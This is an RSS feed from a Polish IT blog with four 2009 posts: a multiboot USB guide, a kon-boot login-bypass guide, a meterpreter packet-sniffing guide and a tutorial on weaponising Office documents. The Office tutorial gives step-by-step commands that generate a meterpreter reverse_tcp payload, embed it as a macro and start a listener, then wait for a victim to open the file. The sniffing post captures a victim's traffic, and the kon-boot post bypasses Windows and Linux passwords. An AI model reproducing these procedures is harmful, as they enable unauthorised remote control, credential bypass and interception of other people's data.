<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Informatyka &#187; bezpieczeństwo</title>
	<atom:link href="http://doradztwo-it.info/category/bezpieczenstwo/feed/" rel="self" type="application/rss+xml" />
	<link>http://doradztwo-it.info</link>
	<description>Pozycjonowanie, reklama, analityka internetowa</description>
	<lastBuildDate>Wed, 21 Jul 2010 12:11:53 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Jeden pendrive dla wielu narzędzi &#8211; kon boot i inne z USB</title>
		<link>http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/</link>
		<comments>http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/#comments</comments>
		<pubDate>Sun, 30 Aug 2009 08:41:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[bezpieczeństwo]]></category>
		<category><![CDATA[narzedzia]]></category>

		<guid isPermaLink="false">http://doradztwo-it.info/?p=93</guid>
		<description><![CDATA[Celem tego artykułu jest opisane stworzenia pendriva z którego będziemy w stanie uruchomić programy takie jak: kon boot backtrack 4 darik&#8217;s Boot And Nuke hiren boot cd itp. Tak więc do dzieła! Czego potrzebujemy? 7zip (lub innego programu pozwalającego wyciągnąć pliki z obrazów iso) grub4dos i grub install (są dostępne na tej samej stronie) PE2USB [...]<p><a href="http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/">Jeden pendrive dla wielu narzędzi &#8211; kon boot i inne z USB</a> Jest artykulem z: <a href="http://doradztwo-it.info">Analityka internetowa, reklama i pocyzjonowanie</a></p>
]]></description>
			<content:encoded><![CDATA[<p>Celem tego artykułu jest opisane stworzenia pendriva z którego będziemy w stanie uruchomić programy takie jak:</p>
<ul>
<li><a href="http://www.piotrbania.com/all/kon-boot/" target="_blank"> kon boot</a></li>
<li>backtrack 4</li>
<li>darik&#8217;s Boot And Nuke</li>
<li>hiren boot cd</li>
</ul>
<p>itp.</p>
<p>Tak więc do dzieła!</p>
<p>Czego potrzebujemy?</p>
<ul>
<li><a href="http://www.7-zip.org/download.html" target="_blank">7zip </a>(lub innego programu pozwalającego wyciągnąć pliki z obrazów iso)</li>
<li><a href="http://sourceforge.net/projects/grub4dos/files/" target="_blank">grub4dos i grub install</a> (są dostępne na tej samej stronie)</li>
<li><a href="http://gocoding.com/page.php?al=petousb" target="_blank">PE2USB</a> (u mnie zadziałała wersja 3.0.0.7)</li>
<li>obrazy narzędzi które chcemy umieścić na płycie (kon-boot,</li>
</ul>
<h3>Zaczynamy &#8211; krok 1</h3>
<p>Uruchamiamy PE2USB. Wybieramy opcje tak jak widać na zrzucie ekranu poniżej.</p>
<div id="attachment_114" class="wp-caption aligncenter" style="width: 300px"><a href="http://doradztwo-it.info/wp-content/uploads/2009/08/pe2usb.jpg" class="highslide-image" onclick="return hs.expand(this);"><img class="size-medium wp-image-114" title="pe2usb" src="http://doradztwo-it.info/wp-content/uploads/2009/08/pe2usb-290x300.jpg" alt="Pe2USB" width="290" height="300" /></a><p class="wp-caption-text">Pe2USB</p></div>
<p>Na pendrivach powyżej 4gb może pojawić się błąd. Nie zwracajcie na niego uwagi &#8211; jedyna rzecz którą trzeba dodatkowo wykonać jest sformatowanie pendriva używając FAT32 na przykład poprzez narzędzie zarządzania dyskami w systemach Windows.</p>
<h3>Instalujemy bootloadera- krok 2</h3>
<p>Najpierw musimy sprawdzić jaki numer dysku ma nasz pendrive. Możemy to zobaczyć w narzędziu zarządzania dyskami windows.</p>
<div id="attachment_115" class="wp-caption aligncenter" style="width: 310px"><a href="http://doradztwo-it.info/wp-content/uploads/2009/08/dyski.jpg" class="highslide-image" onclick="return hs.expand(this);"><img class="size-medium wp-image-115" title="dyski" src="http://doradztwo-it.info/wp-content/uploads/2009/08/dyski-300x214.jpg" alt="Narzędzie zarządzania dyskami Windows" width="300" height="214" /></a><p class="wp-caption-text">Narzędzie zarządzania dyskami Windows</p></div>
<p>Jak widać pendrive opisany jest jako &#8222;dysk 1&#8243;. Uzbrojeni w tą informację przechodzimy dalej.</p>
<p>Nadszedł czas na instalację gruba. Najpierw uruchamiamy plik z grub install &#8211; grubinst_gui.exe.</p>
<p>Wybieramy dysk (w moim wypadku to co sprawdziliśmy przed chwilą &#8211; <strong>hd1. </strong>I na tym koniec &#8211; nic więcej nie zmieniamy w ustawieniach.</p>
<div id="attachment_117" class="wp-caption aligncenter" style="width: 201px"><a href="http://doradztwo-it.info/wp-content/uploads/2009/08/grub-loader1.jpg" class="highslide-image" onclick="return hs.expand(this);"><img class="size-medium wp-image-117" title="grub loader" src="http://doradztwo-it.info/wp-content/uploads/2009/08/grub-loader1-191x300.jpg" alt="Grub Boot loader" width="191" height="300" /></a><p class="wp-caption-text">Grub Boot loader</p></div>
<p><strong>UWAGA jeżeli zaznaczycie zły dysk (np. dysk gdzie zainstalowany jest Windows) Wasz system się już nie uruchomi.</strong></p>
<p>Teraz ze zgranego pliku grub4dos wyciągamy plik <strong>grldr </strong>i umieszczamy go w głównym katalogu na pendrivie.</p>
<h3>Plik menu.lst czyli co chcemy uruchamiać &#8211; krok 3</h3>
<p>Teraz pozostaje nam tylko stworzyć plik <strong>menu.lst</strong> w katalogu głównym pendriva.</p>
<p>Przykładowo aby uruchomić kon-boota należy w pliku umieścić taki oto tekst:</p>
<p>timeout 120<br />
title Kon-Boot<br />
map &#8211;mem /multiboot/FD0-konboot-v1.1-2in1.img (fd0)<br />
map &#8211;hook<br />
chainloader (fd0)+1<br />
map (hd1) (hd0)<br />
map &#8211;hook<br />
rootnoverify (fd0)</p>
<p>Następnie tworzymy katalog <strong>multiboot </strong>na pendrivie gdzie umieszczamy plik FD0-konboot-v1.1-2in1.img wypakowany ze ściągniętej wersji <strong>floppy image</strong> kon-boota.</p>
<p>W tym momencie uruchomienie komputera z pendriva powinno zaowocować pojawieniem się menu w którym możemy wybrać  program kon-boot.</p>
<p>Aby dodać większą ilość programów do menu uruchamiania należy &#8222;wyciągnąć&#8221; pliki z interesujących nas obrazów i odpowiednio dopisać informacje do pliku menu.lst. Niestety każdy program może mieć różne wymagania co do uruchamiania więc poniżej zamieszczam przykładową zawartość mojego pliku menu.lst dla programów:</p>
<ul>
<li>BackTrakck4</li>
<li>Clonezilla</li>
<li>dban</li>
<li>gparted</li>
</ul>
<p>Powodzenia!</p>
<p>title Start Hiren&#8217;s BootCD<br />
find &#8211;set-root /HBCD/boot.gz<br />
map &#8211;mem /HBCD/boot.gz (fd0)<br />
map &#8211;hook<br />
chainloader (fd0)+1<br />
rootnoverify (fd0)<br />
map &#8211;floppies=1<br />
boot</p>
<p>title DBAN<br />
kernel /multiboot/dban/memdisk<br />
initrd /multiboot/dban/dban.img</p>
<p>title Gparted 0.4.5-2<br />
root (hd0,0)<br />
kernel /multiboot/gparted/live/vmlinuz1 live-media-path=/multiboot/gparted/live bootfrom=/dev/sd boot=live union=aufs noswap noprompt vga=789 ip=frommedia<br />
initrd /multiboot/gparted/live/initrd1.img</p>
<p>title Clonezilla<br />
root (hd0,0)<br />
kernel /multiboot/clonezilla/live/vmlinuz1 boot=live union=aufs vga=789 ip=frommedia live-media-path=/multiboot/clonezilla/live bootfrom=/dev/hda toram=filesystem.squashfs noprompt ocs_live_run=&#8221;ocs-live-general&#8221; ocs_live_extra_param=&#8221;" ocs_live_keymap=&#8221;" ocs_live_batch=&#8221;no&#8221; ocs_lang=&#8221;"<br />
initrd /multiboot/clonezilla/live/initrd1.img<br />
boot</p>
<p>title BackTrack 4<br />
kernel /multiboot/bt4/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0&#215;317<br />
initrd /multiboot/bt4/boot/initrd.gz</p>
<div id="crp_related"><h3>Warto przeczytać:</h3><ul><li><a href="http://doradztwo-it.info/bezpieczenstwo/omijanie-zamiast-lamania-hasla-windows-oraz-linux-uzycie-kon-boot/" rel="bookmark" class="crp_title">Omijanie zamiast łamania hasła Windows oraz Linux &#8211; użycie kon-boot</a></li><li><a href="http://doradztwo-it.info/narzedzia/jungledisk-sposob-na-bezpieczne-przechowywanie-danych-online/" rel="bookmark" class="crp_title">Jungledisk &#8211; sposób na bezpieczne przechowywanie danych online</a></li><li><a href="http://doradztwo-it.info/pozycjonowanie/analiza-konkurencji-pozycjonowanie-czyli-czego-nie-widac-na-pierwszy-rzut-oka/" rel="bookmark" class="crp_title">Analiza konkurencji pozycjonowanie &#8211; czyli czego nie widać na pierwszy rzut oka</a></li><li><a href="http://doradztwo-it.info/narzedzia/google-insights-jak-wykorzystac-narzedzie/" rel="bookmark" class="crp_title">Google Insights &#8211; jak wykorzystać narzędzie</a></li><li><a href="http://doradztwo-it.info/bezpieczenstwo/metasploit-i-tworzenie-zarazonych-dokumentow-office/" rel="bookmark" class="crp_title">Metasploit i tworzenie zarażonych dokumentów office</a></li><li>Powered by <a href="http://ajaydsouza.com/wordpress/plugins/contextual-related-posts/">Contextual Related Posts</a></li></ul></div><p><a href="http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/">Jeden pendrive dla wielu narzędzi &#8211; kon boot i inne z USB</a> Jest artykulem z: <a href="http://doradztwo-it.info">Analityka internetowa, reklama i pocyzjonowanie</a></p>
]]></content:encoded>
			<wfw:commentRss>http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit i tworzenie zarażonych dokumentów office</title>
		<link>http://doradztwo-it.info/bezpieczenstwo/metasploit-i-tworzenie-zarazonych-dokumentow-office/</link>
		<comments>http://doradztwo-it.info/bezpieczenstwo/metasploit-i-tworzenie-zarazonych-dokumentow-office/#comments</comments>
		<pubDate>Mon, 03 Aug 2009 11:19:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[bezpieczeństwo]]></category>

		<guid isPermaLink="false">http://doradztwo-it.info/?p=72</guid>
		<description><![CDATA[Tym razem chciałbym rozpisać się lekko na temat użycia platformy Metasploit do zdobywania kontroli nad komputerami poprzez popularne dokumenty word/excel. Jest jedno ograniczenie &#8211; nasz cel musi uruchomić spreparowany odpowiednio przez nas dokument z włączoną obsługą makr! Skoro już wiemy o ograniczeniu to do dzieła &#8230; Zakładam, że: macie zainstalowaną najnowszą wersję Metasploit macie zainstalowanego [...]<p><a href="http://doradztwo-it.info/bezpieczenstwo/metasploit-i-tworzenie-zarazonych-dokumentow-office/">Metasploit i tworzenie zarażonych dokumentów office</a> Jest artykulem z: <a href="http://doradztwo-it.info">Analityka internetowa, reklama i pocyzjonowanie</a></p>
]]></description>
			<content:encoded><![CDATA[<p>Tym razem chciałbym rozpisać się lekko na temat użycia platformy Metasploit do zdobywania kontroli nad komputerami poprzez popularne dokumenty word/excel.</p>
<p>Jest jedno ograniczenie &#8211; nasz cel musi uruchomić spreparowany odpowiednio przez nas dokument z włączoną obsługą makr!</p>
<p>Skoro już wiemy o ograniczeniu to do dzieła &#8230; Zakładam, że:</p>
<ul>
<li>macie zainstalowaną najnowszą wersję Metasploit</li>
<li>macie zainstalowanego Ruby (<a href="http://rubyinstaller.rubyforge.org/wiki/wiki.pl" target="_blank">http://rubyinstaller.rubyforge.org/wiki/wiki.pl</a>)</li>
<li>korzystacie z systemu Windows (wbrew pozorom pod Windows jest trudniej;)</li>
</ul>
<p><strong>Tworzenie pliku skryptu Visual Basic</strong></p>
<p>Cała koncepcja tworzenia zarażonego dokumentu opiera się na umieszczeniu w nim odpowiedniego kodu. W naszym wypadku będzie to meterpreter (w skrócie &#8211; program który pozwala nam później na komunikację z zarażonym komputerem).</p>
<p><em>ruby msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=8888 V &gt; macro.bas</em></p>
<p>Polecenie to wywołujemy w katalogu gdzie siedzi msf32 (np. pod Vistą może to być c:\users\nazwa_naszego_profilu\AppData\Local\msf32.</p>
<p>A teraz przeanalizujmy je po kolei:</p>
<ul>
<li><em>msfpayload windows/meterpreter/reverse_tcp</em> &#8211; w tej części mówimy skryptowi msfpayload &#8222;słuchaj, użyj meterpretera, który połączy się z twoim komputerem po uruchomieniu na komputerze ofiary&#8221;</li>
<li>LHOST to adres routowalny (czyli zewnętrzny) na którym będziemy nasłuchiwać połączenia od komputera ofiary, LPORT to port który musimy mieć otwarty i gotowy do akcji.</li>
<li><em>&gt; macro.vba</em> &#8211; plik wynikowy</li>
</ul>
<p>No i już mamy 1/3 roboty za nami</p>
<p><strong>Dołączanie skryptu do dokumentu Office</strong></p>
<p>Ogólnie ten etap sprowadza się do uruchomienia worda/excela, dotarcia do edytora Visual Basic  i dodania skryptu który stworzyliśmy poprzez file-&gt;import file.</p>
<p>Za nami już ponad połowa drogi &#8230;.</p>
<p><strong>Uruchomienie programu czekającego na połączenie</strong></p>
<p>Już stworzyliśmy dokument, który połączy się z naszym komputerem po uruchomieniu. Musimy rozwiązać ostatni problem, czyli jak odebrać to połączenie? Ktoś dzwoni a nie mamy jeszcze uruchomionego telefonu &#8230; Teraz to zmienimy.</p>
<p>Wystarczy uruchomić Metasploit GUI (odpowiednie skróty powinny się zrobić w start menu po instalacji).  Wybieramy z górnego menu window-&gt;console (lub skrót klawiszowy ctrl+o).</p>
<p>Teraz uruchamiamy nasz telefon.Do tego użyjemy kilku poleceń które wpisujemy po kolei:</p>
<p><em>use exploit/multi/handler</em></p>
<p><em>set PAYLOAD windows/meterpreter/reverse_tcp</em></p>
<p><em>set LHOST XXXX<br />
</em></p>
<p><em>set LPORT 8888<br />
</em></p>
<p><em>show options (pokaże opcje &#8211; sprwadź czy wszystko gra)</em></p>
<p><em>exploit</em></p>
<p>I pozostaje tylko czekać aż ktoś uruchomi nasz dokument &#8230;</p>
<div id="crp_related"><h3>Warto przeczytać:</h3><ul><li><a href="http://doradztwo-it.info/bezpieczenstwo/metasploit-dodanie-funkcji-sniffera/" rel="bookmark" class="crp_title">Metasploit &#8211; dodanie funkcji sniffera</a></li><li><a href="http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/" rel="bookmark" class="crp_title">Jeden pendrive dla wielu narzędzi &#8211; kon boot i inne z USB</a></li><li><a href="http://doradztwo-it.info/bezpieczenstwo/omijanie-zamiast-lamania-hasla-windows-oraz-linux-uzycie-kon-boot/" rel="bookmark" class="crp_title">Omijanie zamiast łamania hasła Windows oraz Linux &#8211; użycie kon-boot</a></li><li><a href="http://doradztwo-it.info/narzedzia/jungledisk-sposob-na-bezpieczne-przechowywanie-danych-online/" rel="bookmark" class="crp_title">Jungledisk &#8211; sposób na bezpieczne przechowywanie danych online</a></li><li><a href="http://doradztwo-it.info/optymalizacja/podstawowe-bledy-stron-docelowych-reklamy/" rel="bookmark" class="crp_title">Podstawowe błędy stron docelowych reklamy</a></li><li>Powered by <a href="http://ajaydsouza.com/wordpress/plugins/contextual-related-posts/">Contextual Related Posts</a></li></ul></div><p><a href="http://doradztwo-it.info/bezpieczenstwo/metasploit-i-tworzenie-zarazonych-dokumentow-office/">Metasploit i tworzenie zarażonych dokumentów office</a> Jest artykulem z: <a href="http://doradztwo-it.info">Analityka internetowa, reklama i pocyzjonowanie</a></p>
]]></content:encoded>
			<wfw:commentRss>http://doradztwo-it.info/bezpieczenstwo/metasploit-i-tworzenie-zarazonych-dokumentow-office/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Omijanie zamiast łamania hasła Windows oraz Linux &#8211; użycie kon-boot</title>
		<link>http://doradztwo-it.info/bezpieczenstwo/omijanie-zamiast-lamania-hasla-windows-oraz-linux-uzycie-kon-boot/</link>
		<comments>http://doradztwo-it.info/bezpieczenstwo/omijanie-zamiast-lamania-hasla-windows-oraz-linux-uzycie-kon-boot/#comments</comments>
		<pubDate>Fri, 17 Jul 2009 07:56:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[bezpieczeństwo]]></category>
		<category><![CDATA[hasła]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[łamanie hasła]]></category>

		<guid isPermaLink="false">http://doradztwo-it.info/?p=51</guid>
		<description><![CDATA[Czasem zdarza się, że musimy uzyskać dostęp do komputera zabezpieczonego hasłem. Oczywiście istnieje wiele aplikacji usuwających hasła (np. Active Password Changer znajdujący się na Hiren Boot Cd &#8211; http://www.hiren.info/pages/bootcd), łamiących hasła (np. Ophcrack &#8211; http://ophcrack.sourceforge.net/) itp. W tej chwili pojawiło się moim zdaniem najlepsze narzędzie, które może nam posłużyć w pominięciu hasła. Nie łamiemy go, [...]<p><a href="http://doradztwo-it.info/bezpieczenstwo/omijanie-zamiast-lamania-hasla-windows-oraz-linux-uzycie-kon-boot/">Omijanie zamiast łamania hasła Windows oraz Linux &#8211; użycie kon-boot</a> Jest artykulem z: <a href="http://doradztwo-it.info">Analityka internetowa, reklama i pocyzjonowanie</a></p>
]]></description>
			<content:encoded><![CDATA[<p>Czasem zdarza się, że musimy uzyskać dostęp do komputera zabezpieczonego hasłem. Oczywiście istnieje wiele aplikacji usuwających hasła (np. Active Password Changer znajdujący się na Hiren Boot Cd &#8211; http://www.hiren.info/pages/bootcd), łamiących hasła (np. Ophcrack &#8211; http://ophcrack.sourceforge.net/) itp.</p>
<p>W tej chwili pojawiło się moim zdaniem najlepsze narzędzie, które może nam posłużyć w pominięciu hasła. Nie łamiemy go, nie usuwamy tylko pomijamy! To wspaniałe narzędzie nazywa się <a href="http://www.piotrbania.com/all/kon-boot/">Kon-Boot</a>. Jakby tego było mało obsługuje również pomijanie haseł w systemach Linux. Cały mechanizm bazuje na zmianie zawartości jądra systemu  &#8211; wszystko odbywa się w pamięci. Nie zostają więc zapisane żadne zmiany na dysku.</p>
<p>Narzędzie na pewno wspiera następujące systemy:</p>
<ul>
<li>Windows Server 2008 Standard SP2 (v.275)</li>
<li>Windows Vista Business SP0</li>
<li>Windows Vista Ultimate SP1</li>
<li>Windows Vista Ultimate SP0</li>
<li>Windows Server 2003 Enterprise</li>
<li>Windows XP</li>
<li>Windows XP SP1</li>
<li>Windows XP SP2</li>
<li>Windows XP SP3</li>
<li>Windows 7</li>
<li>Gentoo 2.6.24-gentoo-r5</li>
<li>Ubuntu 2.6.24.3-debug</li>
<li>Debian 2.6.18-6-6861</li>
<li>Fedora 2.6.25.9-76.fc9.i6862</li>
</ul>
<p>Oczywiście lista może być dużo dłuższa &#8211; po prostu wyżej wymienione zostały przetestowane.</p>
<p>Teraz kilka słów o tym jak z niego skorzystać.</p>
<p><strong>Ściągnij &#8211; wypal</strong></p>
<p>Na stronie <a href="http://www.piotrbania.com/all/kon-boot/">Kon-Boot</a> znajdziecie obrazy ISO do wypalenia na płycie (lub nagrania na dyskietce &#8230; jak kto woli). Po wypaleniu nie przejmujcie się, że płyta wygląda na pustą. Jest to efektem wykorzystania trybu tzw. emulacji stacji dyskietek (Floppy Emulation mode). Jeżeli wolicie mieć program na bootowalnym pendrivie zajrzyjcie tutaj: <a href="http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/">kon-boot i inne na usb</a>.</p>
<p><strong>Korzystaj <img src='http://doradztwo-it.info/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </strong></p>
<p>Teraz pozostaje już tylko uruchomić komputer z wykorzystaniem wypalonej płytki. W przypadku systemów Windows wszystko powinno zadziałać automatycznie &#8211; zobaczycie tylko kilka kiepskich grafik podobnych do tej:</p>
<p><a rel="lightbox" href="http://doradztwo-it.info/wp-content/uploads/2009/07/konboot.png" class="highslide-image" onclick="return hs.expand(this);"><img class="aligncenter size-medium wp-image-52" title="konboot" src="http://doradztwo-it.info/wp-content/uploads/2009/07/konboot-300x167.png" alt="konboot" width="300" height="167" /></a></p>
<p>Po chwili uruchomi się system bez proszenia o hasło. Ot cała filozofia. W przypadku systemów Linux jest jedna zmiana &#8211; należy zalogować się jako użytkownik kon-usr.</p>
<div id="crp_related"><h3>Warto przeczytać:</h3><ul><li><a href="http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/" rel="bookmark" class="crp_title">Jeden pendrive dla wielu narzędzi &#8211; kon boot i inne z USB</a></li><li><a href="http://doradztwo-it.info/bezpieczenstwo/metasploit-i-tworzenie-zarazonych-dokumentow-office/" rel="bookmark" class="crp_title">Metasploit i tworzenie zarażonych dokumentów office</a></li><li><a href="http://doradztwo-it.info/narzedzia/jungledisk-sposob-na-bezpieczne-przechowywanie-danych-online/" rel="bookmark" class="crp_title">Jungledisk &#8211; sposób na bezpieczne przechowywanie danych online</a></li><li><a href="http://doradztwo-it.info/adwords/dopasowanie-zblizone-w-google-adwords-broad-match/" rel="bookmark" class="crp_title">Dopasowanie zbliżone w Google AdWords &#8211; Broad match</a></li><li><a href="http://doradztwo-it.info/analityka/feedburner-i-google-analytics-nareszcie/" rel="bookmark" class="crp_title">Feedburner i Google Analytics &#8230; nareszcie</a></li><li>Powered by <a href="http://ajaydsouza.com/wordpress/plugins/contextual-related-posts/">Contextual Related Posts</a></li></ul></div><p><a href="http://doradztwo-it.info/bezpieczenstwo/omijanie-zamiast-lamania-hasla-windows-oraz-linux-uzycie-kon-boot/">Omijanie zamiast łamania hasła Windows oraz Linux &#8211; użycie kon-boot</a> Jest artykulem z: <a href="http://doradztwo-it.info">Analityka internetowa, reklama i pocyzjonowanie</a></p>
]]></content:encoded>
			<wfw:commentRss>http://doradztwo-it.info/bezpieczenstwo/omijanie-zamiast-lamania-hasla-windows-oraz-linux-uzycie-kon-boot/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit &#8211; dodanie funkcji sniffera</title>
		<link>http://doradztwo-it.info/bezpieczenstwo/metasploit-dodanie-funkcji-sniffera/</link>
		<comments>http://doradztwo-it.info/bezpieczenstwo/metasploit-dodanie-funkcji-sniffera/#comments</comments>
		<pubDate>Mon, 13 Jul 2009 06:47:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[bezpieczeństwo]]></category>

		<guid isPermaLink="false">http://doradztwo-it.info/?p=29</guid>
		<description><![CDATA[Jeżeli ktoś jeszcze nie zna platformy Metasploit zapraszam do artykułu na wikipedii http://en.wikipedia.org/wiki/Metasploit_Project. W skrócie jest to platforma przeznaczona głównie do przeprowadzania testów penetracyjnych sieci. Zawiera ogromną bibliotekę exploitów i różnego rodzaju innych przydatnych narzędzi. Ostatnio dodano nową funkcjonalność (jak na razie tylko do wersji developerskiej) polegającą na możliwości użycia sniffera. Rozszerzenie to działa w [...]<p><a href="http://doradztwo-it.info/bezpieczenstwo/metasploit-dodanie-funkcji-sniffera/">Metasploit &#8211; dodanie funkcji sniffera</a> Jest artykulem z: <a href="http://doradztwo-it.info">Analityka internetowa, reklama i pocyzjonowanie</a></p>
]]></description>
			<content:encoded><![CDATA[<p>Jeżeli ktoś jeszcze nie zna platformy Metasploit zapraszam do artykułu na wikipedii <a href="http://en.wikipedia.org/wiki/Metasploit_Project">http://en.wikipedia.org/wiki/Metasploit_Project</a>.</p>
<p>W skrócie jest to platforma przeznaczona głównie do przeprowadzania testów penetracyjnych sieci. Zawiera ogromną bibliotekę exploitów i różnego rodzaju innych przydatnych narzędzi.</p>
<p>Ostatnio dodano nową funkcjonalność (jak na razie tylko do wersji developerskiej) polegającą na możliwości użycia sniffera. Rozszerzenie to działa w ramach meterpretera i daje zupełnie nowe możliwości dla specjalistów przeprowadzających testy penetracyjne. Aby skorzystać z rozszerzenia należy najpierw dokonać updatu Metasploita. Następnie na komputerze z uruchomionym meterpreterem używamy komend:</p>
<p><strong>use sniffer</strong> (włączenie modułu do sniffowania)</p>
<p><strong>sniffer_interfaces</strong> (pokazuje dostępne interfejsy sieciowe)</p>
<p><strong>sniffer_start numer_interfejsu wielkość_bufora_zapisu </strong>(w tym miejscu już uruchamiamy sniffera&#8230; polecenie może wyglądać np. tak sniffer_start 1 25000)</p>
<p>W trakcie sniffowania możemy używać komendy &#8222;sniffer_stats 1&#8243; (gdzie 1 to wybrany przeze mnie interfejs). Pokaże nam to statystyki związane np. z ilością pakietów które zostały zapisane.</p>
<p>Ostatnim krokiem jest skopiowanie pliku pcap na nasz komputer &#8211; komenda:</p>
<p><strong>sniffer_dump 1 /capture.pcap </strong></p>
<p>A na koniec warto wyłączyć sniffera na komputerze ofiary:</p>
<p><strong>sniffer_stop 1</strong></p>
<p>I to by było na tyle.</p>
<div id="crp_related"><h3>Warto przeczytać:</h3><ul><li><a href="http://doradztwo-it.info/bezpieczenstwo/metasploit-i-tworzenie-zarazonych-dokumentow-office/" rel="bookmark" class="crp_title">Metasploit i tworzenie zarażonych dokumentów office</a></li><li><a href="http://doradztwo-it.info/narzedzia/jungledisk-sposob-na-bezpieczne-przechowywanie-danych-online/" rel="bookmark" class="crp_title">Jungledisk &#8211; sposób na bezpieczne przechowywanie danych online</a></li><li><a href="http://doradztwo-it.info/narzedzia/jeden-pendrive-dla-wielu-narzedzi-kon-boot-i-inne-z-usb/" rel="bookmark" class="crp_title">Jeden pendrive dla wielu narzędzi &#8211; kon boot i inne z USB</a></li><li><a href="http://doradztwo-it.info/pozycjonowanie/seomoz-darmowe-narzedzia-seo-czy-warto/" rel="bookmark" class="crp_title">Seomoz &#8211; darmowe narzędzia SEO &#8211; czy warto?</a></li><li><a href="http://doradztwo-it.info/usability/uzytecznosc-wyszukiwarki-na-stronie-na-co-zwracac-uwage/" rel="bookmark" class="crp_title">Użyteczność wyszukiwarki na stronie &#8211; na co zwracać uwagę</a></li><li>Powered by <a href="http://ajaydsouza.com/wordpress/plugins/contextual-related-posts/">Contextual Related Posts</a></li></ul></div><p><a href="http://doradztwo-it.info/bezpieczenstwo/metasploit-dodanie-funkcji-sniffera/">Metasploit &#8211; dodanie funkcji sniffera</a> Jest artykulem z: <a href="http://doradztwo-it.info">Analityka internetowa, reklama i pocyzjonowanie</a></p>
]]></content:encoded>
			<wfw:commentRss>http://doradztwo-it.info/bezpieczenstwo/metasploit-dodanie-funkcji-sniffera/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

